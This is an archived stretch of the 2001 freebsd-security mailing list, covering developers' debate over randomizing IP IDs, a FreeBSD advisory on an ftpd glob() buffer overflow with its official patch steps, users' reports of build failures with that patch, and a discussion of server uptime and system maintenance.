another way: I think this sort of thing is an excellent :> example of introducing unnecessary kernel bloat into the system. Who :> gives a fart whether someone can port scan you efficiently or :> anonymously or not? I get port scanned every day. Most hackers don't :> even bother with portscans, they just try the exploit on the target= :=20 :> machines directly. : :Tools, not policy.. : :You may not care about it, but others do. : :Kris If it isn't already a kernel option, please make it one. I don't want it compiled into the binary. Those people who 'care' can add it to their kernel config. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 10:47: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from cithaeron.argolis.org (bgm-24-94-35-22.stny.rr.com [24.94.35.22]) by hub.freebsd.org (Postfix) with ESMTP id C9CD737B440; Tue, 17 Apr 2001 10:46:51 -0700 (PDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.11.3/8.11.3) with ESMTP id f3HHjQY46361; Tue, 17 Apr 2001 13:45:27 -0400 (EDT) (envelope-from piechota@argolis.org) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Tue, 17 Apr 2001 13:45:26 -0400 (EDT) From: Matt Piechota To: Kris Kennaway Cc: Matt Dillon , Niels Provos , Wes Peters , , , Subject: Re: non-random IP IDs In-Reply-To: <20010417103823.A49384@xor.obsecurity.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 17 Apr 2001, Kris Kennaway wrote: > > :Well, that's why it's a sysctl defaulting to off in my patch. Don't > > :turn it on if you don't want to. > > > > Let me put it another way: I think this sort of thing is an excellent > > example of introducing unnecessary kernel bloat into the system. Who > > gives a fart whether someone can port scan you efficiently or > > anonymously or not? I get port scanned every day. Most hackers don't > > even bother with portscans, they just try the exploit on the target > > machines directly. > > Tools, not policy.. > > You may not care about it, but others do. Would it be better to do it as a kernel option? options IP_RANDOM_IP_ID for instance? I guess the question is, does the kernel have to do a comparison to the sysctl variable each time? -- Matt Piechota Finger piechota@emailempire.com for PGP key AOL IM: cithaeron To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 10:54:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 0499F37B423; Tue, 17 Apr 2001 10:54:37 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 50227675EE; Tue, 17 Apr 2001 10:54:25 -0700 (PDT) Date: Tue, 17 Apr 2001 10:54:24 -0700 From: Kris Kennaway To: Matt Dillon Cc: freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs Message-ID: <20010417105424.A63938@xor.obsecurity.org> References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com> <20010416233042.A21394@xor.obsecurity.org> <200104171731.f3HHVFu94944@earth.backplane.com> <20010417103823.A49384@xor.obsecurity.org> <200104171741.f3HHfNZ95206@earth.backplane.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="WIyZ46R2i8wDzkSu" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104171741.f3HHfNZ95206@earth.backplane.com>; from dillon@earth.backplane.com on Tue, Apr 17, 2001 at 10:41:23AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --WIyZ46R2i8wDzkSu Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Apr 17, 2001 at 10:41:23AM -0700, Matt Dillon wrote: >=20 > :> Let me put it another way: I think this sort of thing is an excel= lent > :> example of introducing unnecessary kernel bloat into the system. = Who > :> gives a fart whether someone can port scan you efficiently or > :> anonymously or not? I get port scanned every day. Most hackers d= on't > :> even bother with portscans, they just try the exploit on the targe= t=3D > :=3D20 > :> machines directly. > : > :Tools, not policy.. > : > :You may not care about it, but others do. > : > :Kris >=20 > If it isn't already a kernel option, please make it one. I don't=20 > want it compiled into the binary. Those people who 'care' can > add it to their kernel config. That's probably a reasonable compromise. Kris --WIyZ46R2i8wDzkSu Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE63INQWry0BWjoQKURApnUAJ4sAl/zGR1o5U5kkq3f4MPhKdlXkwCeOM6d 7BEla6Tvf4GNmd0n/wTNdrk= =2JeN -----END PGP SIGNATURE----- --WIyZ46R2i8wDzkSu-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 10:55: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 225E637B43C; Tue, 17 Apr 2001 10:54:52 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GBY72W00.NB6; Tue, 17 Apr 2001 10:54:32 -0700 Message-ID: <3ADC8368.C96550FE@globalstar.com> Date: Tue, 17 Apr 2001 10:54:48 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Kris Kennaway Cc: Matt Dillon , Niels Provos , Wes Peters , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com> <20010416233042.A21394@xor.obsecurity.org> <200104171731.f3HHVFu94944@earth.backplane.com> <20010417103823.A49384@xor.obsecurity.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > > On Tue, Apr 17, 2001 at 10:31:15AM -0700, Matt Dillon wrote: > > > > :> It's not worth doing. We would be introducing unnecessary cpu burn on > > :> every single packet we sent out, all to solve a problem that doesn't > > :> really exist. > > : > > :Well, that's why it's a sysctl defaulting to off in my patch. Don't > > :turn it on if you don't want to. > > : > > :Kris > > > > Let me put it another way: I think this sort of thing is an excellent > > example of introducing unnecessary kernel bloat into the system. Who > > gives a fart whether someone can port scan you efficiently or > > anonymously or not? I get port scanned every day. Most hackers don't > > even bother with portscans, they just try the exploit on the target > > machines directly. > > Tools, not policy.. > > You may not care about it, but others do. Some people want it. The code already exists. Put it in the source tree so those people who want it can have it, but more importantly, so we never have to explain why OpenBSD has IP ID randomization and FreeBSD does not or otherwise go through this same thread ever again. I think the only bikesh^H^H^H^H^H^H question should be whether it is (a) always built into the kernel, but has the sysctl switched off, or (b) it requires a kernel config option like, options IP_ID_RANDOMIZE (Which will not be in GENERIC) to get the code in the kernel. Personally, I like (b). It's right there for those who want it, but the bloat-watchers don't have to see that extra few bytes going to kernelland. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 11: 6:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by hub.freebsd.org (Postfix) with ESMTP id 0EBC637B42C; Tue, 17 Apr 2001 11:06:33 -0700 (PDT) (envelope-from d.m.pick@qmw.ac.uk) Received: from xi.css.qmw.ac.uk ([138.37.8.11]) by zeta.qmw.ac.uk with esmtp (Exim 3.16 #1) id 14pZry-0005qP-00; Tue, 17 Apr 2001 19:06:30 +0100 Received: from cgaa180 by xi.css.qmw.ac.uk with local (Exim 1.92 #1) id 14pZry-0002mO-00; Tue, 17 Apr 2001 19:06:30 +0100 X-Mailer: exmh version 2.0.2 2/24/98 To: freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org Subject: Re: non-random IP IDs In-reply-to: Your message of "Tue, 17 Apr 2001 13:45:26 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 17 Apr 2001 19:06:30 +0100 From: David Pick Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Would it be better to do it as a kernel option? > options IP_RANDOM_IP_ID for instance? I guess the question is, does the > kernel have to do a comparison to the sysctl variable each time? No. *IF* (big if!) something gets notified when a sysctl variable gets changed (and I don't know of this is true) then if can test the variable once and set a *function* variable to one of two functions: one simple and fast, the other complicated and slow. No test needed for every packet. Of course, the overhead of a procedure call might (in the fast case) be more than the overhead of an inline test. So perhaps write it as: if (function variable) { function_varuable(parameter) } else { /* inline code */ } But there a *lots* of other tests per packet - is one more *that* bad? -- David Pick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 11: 7:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from orthanc.ab.ca (orthanc.ab.ca [207.167.3.130]) by hub.freebsd.org (Postfix) with ESMTP id C6F0B37B632 for ; Tue, 17 Apr 2001 11:07:05 -0700 (PDT) (envelope-from lyndon@orthanc.ab.ca) Received: from orthanc.ab.ca (localhost [127.0.0.1]) by orthanc.ab.ca (8.11.2/8.11.2) with ESMTP id f3HI74p23303 for ; Tue, 17 Apr 2001 12:07:04 -0600 (MDT) (envelope-from lyndon@orthanc.ab.ca) Message-Id: <200104171807.f3HI74p23303@orthanc.ab.ca> From: Lyndon Nerenberg Organization: The Frobozz Magic Homing Pigeon Company To: freebsd-security@FreeBSD.ORG Subject: Re: Interaction between ipfw, IPSEC and natd In-reply-to: Your message of "Tue, 17 Apr 2001 15:06:53 BST." Date: Tue, 17 Apr 2001 12:07:04 -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> "David" == David Pick writes: David> I think so - but I don't see why a daemon whould be David> necessary. It seems to me that the sort of mechanism used David> by the "gif" interfaces would be appropriate. It *might* David> even be possible to extend the "gif" interface to do the David> job. The difference being that instead of encapsulating in David> an IP "tunnel" it would encapsulate in an IPSEC David> "tunnel". You've pretty much described the OpenBSD enc(4) interface: ENC(4) OpenBSD Programmer's Manual ENC(4) NAME enc - Encapsulating Interface SYNOPSIS pseudo-device enc 4 DESCRIPTION The enc interface is a software loopback mechanism that allows hosts or firewalls to filter ipsec(4) traffic using ipf(5). The vpn(8) manpage shows an example of such a setup. The other use of the enc interface is to allow an administrator to see outgoing packets before they have been processed by ipsec(4), or incoming packets after they have been similarly processed, via tcpdump(8). The ``enc0'' interface inherits all IPsec traffic. Thus all IPsec traf- fic can be filtered based on ``enc0'', and all IPsec traffic could be seen by invoking tcpdump(8) on the ``enc0'' interface. --lyndon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 11:18:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 6971837B43E; Tue, 17 Apr 2001 11:17:58 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id OAA13455; Tue, 17 Apr 2001 14:12:40 -0400 (EDT) (envelope-from wollman) Date: Tue, 17 Apr 2001 14:12:40 -0400 (EDT) From: Garrett Wollman Message-Id: <200104171812.OAA13455@khavrinen.lcs.mit.edu> To: "Crist Clark" Cc: freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs In-Reply-To: <3ADC8368.C96550FE@globalstar.com> References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com> <20010416233042.A21394@xor.obsecurity.org> <200104171731.f3HHVFu94944@earth.backplane.com> <20010417103823.A49384@xor.obsecurity.org> <3ADC8368.C96550FE@globalstar.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > Personally, I like (b). It's right there for those who want it, but > the bloat-watchers don't have to see that extra few bytes going to > kernelland. I think this is reasonable. With the way memory subsystems work these days, we need to avoid wasting valuable cache in order to get the maximum possible performance. -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 11:25:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from sasami.jurai.net (sasami.jurai.net [64.0.106.45]) by hub.freebsd.org (Postfix) with ESMTP id D4D0F37B422 for ; Tue, 17 Apr 2001 11:25:23 -0700 (PDT) (envelope-from scanner@jurai.net) Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id OAA38269; Tue, 17 Apr 2001 14:25:21 -0400 (EDT) Date: Tue, 17 Apr 2001 14:25:21 -0400 (EDT) From: To: Crist Clark Cc: freebsd-security@FreeBSD.ORG Subject: Re: non-random IP IDs In-Reply-To: <3ADC8368.C96550FE@globalstar.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [CC trimmed because most dont need to see personal opinions...] > Personally, I like (b). It's right there for those who want it, but > the bloat-watchers don't have to see that extra few bytes going to > kernelland. I vote for (b) as well. As one person who sees to much crap in a base install that a user has no control over. I prefer to have someone opt-in to bloating then force it on someone. As far as technical merrit which is better I leave that to the person(s) implementing the code. Ahhh I remember 2.1 days when my kernel's were ~700K :) ============================================================================= -Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas Home: scanner@deceptively.shady.org | http://open-systems.net ============================================================================= WINDOWS: "Where do you want to go today?" LINUX: "Where do you want to go tomorrow?" BSD: "Are you guys coming or what?" ============================================================================= irc.openprojects.net #FreeBSD -Join the revolution! ICQ: 20016186 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 12: 9:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A285D37B43C; Tue, 17 Apr 2001 12:09:42 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f3HJ9gH14235; Tue, 17 Apr 2001 12:09:42 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Date: Tue, 17 Apr 2001 12:09:42 -0700 (PDT) Message-Id: <200104171909.f3HJ9gH14235@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:33 Security Advisory FreeBSD, Inc. Topic: globbing vulnerability in ftpd Category: core Module: ftpd/libc Announced: 2001-04-17 Credits: John McDonald and Anthony Osborne, COVERT Labs Affects: FreeBSD 3.x (all releases), FreeBSD 4.x (all releases), FreeBSD 3.5-STABLE and 4.3-RC prior to the correction date. Corrected: 2001-04-17 (FreeBSD 4.3-RC) 2001-04-17 (FreeBSD 3.5-STABLE) Vendor status: Corrected FreeBSD only: NO I. Background Numerous FTP daemons, including the daemon distributed with FreeBSD, use server-side globbing to expand pathnames via user input. This globbing is performed by FreeBSD's glob() implementation in libc. II. Problem Description The glob() function contains potential buffer overflows that may be exploitable through the FTP daemon. If a directory with a name of a certain length is present, a remote user specifying a pathname using globbing characters may cause arbitrary code to be executed on the FTP server as user running ftpd, usually root. Additionally, when given a path containing numerous globbing characters, the glob() functions may consume significant system resources when expanding the path. This can be controlled by setting user limits via /etc/login.conf and setting limits on globbing expansion. All versions of FreeBSD prior to the correction date, including FreeBSD 3.5.1 and 4.2 contain this problem. The base system that will ship with FreeBSD 4.3 does not contain this problem since it was corrected before the release. III. Impact Remote users may be able to execute arbitrary code on the FTP server as the user running ftpd, usually root. The FTP daemon supplied with FreeBSD is enabled by default to allow access to authorized local users and not anonymous users, thus limiting the impact to authorized local users. IV. Workaround If the FTP daemon is executed from inetd, disable the FTP daemon by commenting out the ftp line in /etc/inetd.conf, then reload the inetd configuration by executing the following command as root: # killall -HUP inetd V. Solution One of the following: 1) Upgrade to FreeBSD 4.3-RC or 3.5.1-STABLE after the correction date. 2) Download the patch and detached PGP signature from the following location: The following patch applies to FreeBSD 4.x: # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.4.x.patch # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.4.x.patch.asc The following patch applies to FreeBSD 3.x: # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.3.x.patch # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/glob.3.x.patch.asc Verify the detached signature using your PGP utility. Issue the following commands as root: # cd /usr/src # patch -p < /path/to/patch # cd /usr/src/lib/libc # make all install # cd /usr/src/libexec/ftpd # make all install If the FTP daemon is running standalone, it will have to be manually stopped and restarted. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOtyT/VUuHi5z0oilAQGiIAP8CJ6Hsp52DuBQhQnA4xBl23kTCtCUKdPf zRP5yg5B9w+j+6Q6+k2P1B9lv5JcdvmS8+fzfrWUpUAogqkbL5f0njS7fnA68a5H oiGJgWqLQiMQiszeOOpgqvd1fNRCcCX+SgYewIfP93Cvam+GG+TvZQziV2zcne3O tjBG/FVzXkg= =P1j0 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 12:40:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 15FB037B423 for ; Tue, 17 Apr 2001 12:40:38 -0700 (PDT) (envelope-from fpscha@ns1.via-net-works.net.ar) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id QAA02034 for security@freebsd.org; Tue, 17 Apr 2001 16:42:57 -0300 (ART) From: Fernando Schapachnik Message-Id: <200104171942.QAA02034@ns1.via-net-works.net.ar> Subject: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) To: security@freebsd.org Date: Tue, 17 Apr 2001 16:42:57 -0300 (ART) Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is it just me or the patch against 4.2-REL says: cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/gen/glob.c -o glob.o /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared (first use in this function) /usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier is reported only once /usr/src/lib/libc/../libc/gen/glob.c:171: for each function it appears in.) /usr/src/lib/libc/../libc/gen/glob.c: In function `globextend': /usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared (first use in this function) *** Error code 1 Where are GLOB_LIMIT and GLOB_MAXPATH supposed to be defined? TIA! Fernando P. Schapachnik Planificación de red y tecnología VIA NET.WORKS ARGENTINA S.A. fschapachnik@vianetworks.com.ar Tel.: (54-11) 4323-3381 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 12:53:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from vms4.rit.edu (vms4.isc.rit.edu [129.21.3.15]) by hub.freebsd.org (Postfix) with ESMTP id 044A937B424 for ; Tue, 17 Apr 2001 12:53:33 -0700 (PDT) (envelope-from jrb4838@ritvax.isc.rit.edu) Received: from nazinet ([129.21.142.12]) by ritvax.isc.rit.edu (PMDF V5.2-32 #41784) with SMTP id <01K2IFQ5DXC207JLIH@ritvax.isc.rit.edu> for freebsd-security@freebsd.org; Tue, 17 Apr 2001 15:53:25 EDT Date: Tue, 17 Apr 2001 15:56:42 -0400 From: Jason Burdick Subject: Re: FreeBSD Security Advisory FreeBSD-SA-01:33.ftpd-glob (fwd) To: freebsd-security@freebsd.org Message-id: <015c01c0c778$8676a7e0$0c8e1581@rh.rit.edu> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 X-Mailer: Microsoft Outlook Express 5.50.4133.2400 Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 7BIT X-Priority: 3 X-MSMail-priority: Normal References: <200104171942.QAA02034@ns1.via-net-works.net.ar> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I just had the same output, a 'make clean' and another 'make all install' didn't work. ?? Jason Burdick Systems Admin - Nutty Hosting >Is it just me or the patch against 4.2-REL says: cc -O -pipe -DLIBC_RCS -DSYSLIBC_RCS -I/usr/src/lib/libc/include -D__DBINTERFACE_PRIVATE -DINET6 -DPOSIX_MISTAKE -I/usr/src/lib/libc/../libc/locale -DBROKEN_DES -DYP -c /usr/src/lib/libc/../libc/gen/glob.c -o glob.o /usr/src/lib/libc/../libc/gen/glob.c: In function `glob': /usr/src/lib/libc/../libc/gen/glob.c:171: `GLOB_MAXPATH' undeclared (first use in this function) /usr/src/lib/libc/../libc/gen/glob.c:171: (Each undeclared identifier is reported only once /usr/src/lib/libc/../libc/gen/glob.c:171: for each function it appears in.) /usr/src/lib/libc/../libc/gen/glob.c: In function `globextend': /usr/src/lib/libc/../libc/gen/glob.c:689: `GLOB_LIMIT' undeclared (first use in this function) *** Error code 1 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 13:13:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id D94E937B423; Tue, 17 Apr 2001 13:13:09 -0700 (PDT) (envelope-from bright@fw.wintelcom.net) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f3HKD0322697; Tue, 17 Apr 2001 13:13:00 -0700 (PDT) Date: Tue, 17 Apr 2001 13:13:00 -0700 From: Alfred Perlstein To: "Rodney W. Grimes" Cc: Darren Reed , Julian Elischer , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG Subject: Re: non-random IP IDs Message-ID: <20010417131300.L976@fw.wintelcom.net> References: <20010417043130.F976@fw.wintelcom.net> <200104171737.KAA56704@gndrsh.dnsmgr.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104171737.KAA56704@gndrsh.dnsmgr.net>; from freebsd@gndrsh.dnsmgr.net on Tue, Apr 17, 2001 at 10:37:56AM -0700 X-all-your-base: are belong to us. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Rodney W. Grimes [010417 10:37] wrote: > > * Darren Reed [010417 04:29] wrote: > > > In some mail from Julian Elischer, sie said: > > > > > > > > there is a site that calculates server uptime from these numbers. > > > > All the leading machines are freeBSD. When you do this it will > > > > no-longer be able to track us :-( > > > > > > IMHO, extraordinarily large uptimes are nothing to be proud of and > > > say nothing about the quality of software. > > > > > > I'd almost go so far as to say uptimes greater than 1 year indicate > > > that the system administration practises need review. > > > > Agreed. I've yet to hear about any seriously deployed system > > go without security advisories for over a year. > > Or perhaps this is a very talented system admin who values uptime > and finds work arounds that don't envolve downing a system that do > just as good, and sometimes better, than the vendor fix for the > security issue. > > Security Fix != Reboot required. Well I was the one that asked Jake if he could provide a system for patching static functions in the kernel. If you search the archives there is a patch for doing this. It's actually quite reasonable to patch code out from under a running system. One can replace the entry opcode of the function with a jump to the patched code. The only time this becomes a problem is when structures change, however backporting the fix shouldn't be a problem. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] Represent yourself, show up at BABUG http://www.babug.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 13:18: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from sabre.velocet.net (sabre.velocet.net [198.96.118.66]) by hub.freebsd.org (Postfix) with ESMTP id E7B6637B42C for ; Tue, 17 Apr 2001 13:17:59 -0700 (PDT) (envelope-from dgilbert@office.tor.velocet.net) Received: from office.tor.velocet.net (trooper.velocet.net [204.138.45.2]) by sabre.velocet.net (Postfix) with ESMTP id 4A7C0137F1C for ; Tue, 17 Apr 2001 16:17:59 -0400 (EDT) Received: (from dgilbert@localhost) by office.tor.velocet.net (8.11.2/8.9.3) id f3HKHw757137; Tue, 17 Apr 2001 16:17:58 -0400 (EDT) (envelope-from dgilbert) From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15068.42230.542567.656295@trooper.velocet.net> Date: Tue, 17 Apr 2001 16:17:58 -0400 (EDT) To: freebsd-security@freebsd.org Subject: ftp fix borked for 3.2. X-Mailer: VM 6.75 under 20.4 "Emerald" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It would appear that the ftpd patch won't apply to 3.2 (the build fails). Anyone tried this (or is there a smaller patch?) Dave. -- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite. | =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Apr 17 13:47:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from caligula.anu.edu.au (caligula.anu.edu.au [150.203.224.42]) by hub.freebsd.org (Postfix) with ESMTP id 819D437B43F; Tue, 17 Apr 2001 13:47:03 -0700 (PDT) (envelope-from avalon@caligula.anu.edu.au) Received: (from avalon@localhost) by caligula.anu.edu.au (8.9.3/8.9.3) id GAA04095; Wed, 18 Apr 2001 06:46:57 +1000 (EST) From: Darren Reed Message-Id: <200104172046.GAA04095@caligula.anu.edu.au> Subject: Re: non-random IP IDs To: bright@wintelcom.net (Alfred Perlstein) Date: Wed, 18 Apr 2001 06:46:57 +1000 (Australia/ACT) Cc: freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG In-Reply-To: <20010417131300.L976@fw.wintelcom.net> from "Alfred Perlstein" at Apr 17, 2001 01:13:00 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Alfred Perlstein, sie said: > > * Rodney W. Grimes [010417 10:37] wrote: > > > * Darren Reed [010417 04:29] wrote: > > > > In some mail from Julian Elischer, sie said: > > > > > > > > > > there is a site that calculates server uptime from these numbers. > > > > > All the leading machines are freeBSD. When you do this it will > > > > > no-longer be able to track us :-( > > > > > > > > IMHO, extraordinarily large uptimes are nothing to be proud of and > > > > say nothing about the quality of software. > > > > > > > > I'd almost go so far as to say uptimes greater than 1 year indicate > > > > that the system administration practises need review. [WARNING: major digression from security ahead] I'm not talking (just) about security here. I'm talking about systems maintenance. How long has your box been up ? How many changes to the system config have been made since then ? If you're not there, and it reboots, will it come up 100% functional ? Do your computers need some amount of preventative maintenance like internal cleaning to deal with dust build up, etc ? How many times do unscheduled reboots result in hardware not spinning back up and at an inconevient time ? Any non-trivial change to startup (or bootup) sequence should be tested and how do you do that without a reboot ? Else where is the egg when that "she'll be right mate" change fails at 9:00am on Monday morning and you've slept in ? There is so much more to serious system admin (from your personal desktops to mainframes) than just applying (security) patches and keeping it running with no downtime. Well, that is when you don't have hot-swap everything :) None of my personal boxes have uptimes that ever exceed 6 months, even my servers, but I have complete confidence in them rebooting and services being restarted (modulo file system damage from an unclean shutdown). Darren To 